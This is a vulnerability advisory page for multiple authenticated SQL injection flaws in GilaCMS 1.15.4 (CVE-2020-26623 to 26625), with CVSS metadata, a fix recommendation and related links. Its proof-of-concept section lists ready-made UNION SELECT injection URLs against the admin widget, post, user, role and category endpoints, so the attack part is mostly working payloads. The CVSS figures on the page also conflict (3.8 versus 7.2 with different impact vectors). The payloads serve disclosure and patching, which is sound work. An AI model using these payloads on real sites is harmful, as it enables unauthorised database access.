Lucene search
Louise Ng1337DAY-ID-39203HistoryDec 22, 2023 - 12:00 a.m.
GilaCMS 1.15.4 SQL Injection Vulnerability
2023-12-2200:00:00
Louise Ng
0day.today
252
sql injection
remote attacker
cms
cve-2020-26623
cve-2020-26624
cve-2020-26625
cvss 7.2
arbitrary web scripts
update
gilacms 1.15.4
version 2.0.1
CVSS3
3.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N
AI Score
7.2
Confidence
Low
EPSS
0.001
Percentile
42.6%
Description: GilaCMS <=1.15.4 - Mutiple SQL injection vulnerabilties
Affected CMS: GilaCMS
Affected Version: <= 1.15.4
CVE ID: CVE-2020-26623, CVE-2020-26624, CVE-2020-26625
CVSS Score: 7.2 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd
Multiple SQL injection vulnerabilities were discovered in Gila CMS 1.15.4 and before which allows a remote attacker to execute arbitary web scripts.
Proof of Concept:
Attack Vector 1:
After login into admin portal, go to administration>widget and use wiget area filter to perform search
Sample payload:
http://targeturl/cm/list_rows/widget?page=1&area=dashboard'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,@@version,NULL--%20
Attack Vector 2:
After login into admin portal, go to edit post/page/role/user/category/userpost
Sample payload:
http://targeturl/cm/edit_form/userrole?id=2'%20and%201%3d0%20UNION%20ALL%20SELECT%20@@version,NULL,NULL--%20&callback=g_form_popup_update
http://targeturl/cm/edit_form/user?id=1'%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20
http://targeturl/cm/edit_form/page?id=7'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL--%20
http://targeturl/cm/edit_form/post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20%20&callback=g_form_popup_update
http://targeturl/cm/edit_form/postcategory?id=11'%20%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,NULL,@@version--%20&callback=g_form_popup_update
http://targeturl/cm/edit_form/user-post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&callback=g_form_popup_update
Attacker Vector 3:
After login into admin portal, go to Content>Posts and use Users filter to perform search
Sample payload:
http://targeturl/cm/list_rows/post?page=1&user_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,@@version,NULL--%20
Recommendation
Update to v2.0.1
http://gilacms.com
https://github.com/GilaCMS/gila
https://github.com/GilaCMS/gila/security/policy
Related
packetstorm
packetstorm
GilaCMS 1.15.4 SQL Injection
2023-12-22 00:00:00
github
github
Gila CMS SQL Injection vulnerability
2024-01-03 00:30:22
Gila CMS SQL Injection
2024-01-03 00:30:22
Gila CMS SQL Injection vulnerability
2024-01-03 00:30:23
nvd
nvd
veracode
veracode
cvelist
cvelist
osv
osv
Gila CMS SQL Injection
2024-01-03 00:30:22
Gila CMS SQL Injection vulnerability
2024-01-03 00:30:22
Gila CMS SQL Injection vulnerability
2024-01-03 00:30:23
prion
prion
cve
cve
cnvd
cnvd
Gila CMS Area Parameter SQL Injection Vulnerability
2024-01-08 00:00:00
CVSS3
3.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N
AI Score
7.2
Confidence
Low
EPSS
0.001
Percentile
42.6%
Related for 1337DAY-ID-39203